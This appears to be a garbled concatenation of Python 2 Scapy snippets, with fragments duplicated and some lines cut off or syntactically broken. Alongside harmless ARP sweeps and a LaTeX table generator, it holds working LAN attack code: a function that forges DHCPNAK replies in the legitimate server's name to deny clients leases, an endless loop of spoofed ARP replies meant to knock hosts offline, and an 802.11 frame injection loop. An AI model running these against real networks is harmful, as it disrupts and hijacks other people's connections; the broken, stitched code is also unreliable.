def arping(iprange="10.0.1.0/24"):
"""Arping function takes IP Address or Network, returns nested mac/ip list"""
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
timeout=2)
collection = []
for snd, rcv in ans:
result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
collection.append(result)
return collection
def nak_request(pkt):
msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2)
sendp(
Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) /
IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) /
UDP(sport=67, dport=68) / BOOTP(op=2,
ciaddr=pkt[IP].src,
siaddr=pkt[IP].dst,
chaddr=pkt[Ether].src,
xid=pkt[BOOTP].xid) /
DHCP(options=[('server_id', globals()['dhcp_server_ip']),
('message-type', 'nak'), ('end')]))
def arping(iprange="10.0.1.0/24"):
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange),
timeout=2)
collection = []
for snd, rcv in ans:
result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split()
collection.append(result)
return collection
if __name__ == '__main__':
if len(sys.argv) > 1:
for ip in sys.argv[1:]:
print "arping", ip
print arping(ip)
else:
print apring()
def fisting():
arp_fist = ARP(pdst=argv[1], op=2)
print "We are going to loop forever, CTRL-C to stop...\n"
while True:
sleep(3)
for a in arp_fist:
arping = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=a.pdst)
ans, unans = srp(arping, timeout=0.1)
if len(ans) == 1:
a.psrc = a.pdst
print a.pdst, "is ALIVE!"
print "* Time to shut it down!"
send(a)
ans2, unans2 = srp(arping, timeout=0.1)
if len(unans2) == 1:
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
print "@@@", a.psrc, "was rubber fisted!"
print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
sleep(3)
else:
print "FAILED:", a.pdst, "is still alive :-("
else:
print a.pdst, "is already DEAD!"
print
print "Interface %s created. Configure it and use it" % ifname
# Speed optimization si Scapy does not have to parse payloads
Ether.payload_guess = []
SNAP.payload_guess = []
try:
while 1:
r = select([f, s], [], [])[0]
# frame from /dev/net/tun
if f in r:
# tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
buf = os.read(f, 1526)
eth_rcvd_frame = Ether(buf[4:])
if DEBUG:
os.write(1, "Received from %s\n" % ifname)
if VERB:
os.write(1, "%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = Dot11(type="Data",
FCfield="from-DS",
addr1=eth_rcvd_frame.getlayer(Ether).dst,
addr2=BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
attempted_dhcpnaks = {}
# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to
# cross reference it with ARP packets to see from which DHCP server a lease was obtained.
macs = {}
def msg(string, level):
if globals()['verbose'] >= level:
print(string)
# Sending a DHCPDISCOVER to aquire the DHCP server IP.
msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2)
sendp(
Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff") /
IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) /
BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000) /
DHCP(options=[('message-type', 'discover'), ('end')]))
# Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our
# own DHCP server via a bpf filter in the sniff command below.
def get_dhcp_server(pkt):
if pkt[DHCP] and pkt[DHCP].options[0][1] == 2:
globals()["dhcp_server_ip"] = pkt[IP].src
globals()["dhcp_server_mac"] = pkt[Ether].src
msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1)
# Detecting DHCPREQUEST packets and ARP packets.
def __call__(self):
"""Get the original scapy packet."""
pkt = Ether(self.____contents)
pkt.time = self.____time
return pkt
print "Interface %s created. Configure it and use it" % ifname
# Speed optimization si Scapy does not have to parse payloads
Ether.payload_guess=[]
SNAP.payload_guess=[]
try:
while 1:
r = select([f,s],[],[])[0]
# frame from /dev/net/tun
if f in r:
# tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
buf = os.read(f,1526)
eth_rcvd_frame=Ether(buf[4:])
if DEBUG:
os.write(1,"Received from %s\n" % ifname)
if VERB:
os.write(1,"%s\n" % eth_rcvd_frame.summary())
# Prepare Dot11 frame for injection
dot11_sent_frame = Dot11(
type = "Data",
FCfield = "from-DS",
addr1 = eth_rcvd_frame.getlayer(Ether).dst,
addr2 = BSSID)
# It doesn't seem possible to set tuntap interface MAC address
# when we create it, so we set source MAC here
if not HAS_SMAC:
#! /usr/bin/env python
# arping2tex : arpings a network and outputs a LaTeX table as result
import sys
if len(sys.argv) != 2:
print "Usage: arping2tex <net>\n eg: arping2tex 192.168.1.0/24"
sys.exit(1)
from scapy import srp, Ether, ARP, conf
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]),
timeout=2)
print "\\begin{tabular}{|l|l|}"
print "\\hline"
print "MAC & IP\\\\"
print "\\hline"
for s, r in ans:
print r.sprintf("%Ether.src% & %ARP.psrc%\\\\")
print "\\hline"
print "\end{tabular}"
from scapy import srp,Ether,ARP,conf
conf.verb=0
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="10.0.1.1"),
timeout=2)
for snd, rcv in ans:
print rcv.sprintf(r"%Ether.src% %ARP.psrc%")
#from scapy.all import srp,Ether,ARP,conf
import sys
from datetime import datetime
try:
interface = raw_input("enter iface")
ips = raw
try:
from scapy import srp,Ether,ARP,conf
except ImportError:
del scapy
from scapy import all as scapy
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff"))/ARP, timeout = 2, iface = interface, inter =0.1
def __call__(self):
"""Get the original scapy packet."""
pkt = Ether(self.____contents)
pkt.time = self.____time
return pkt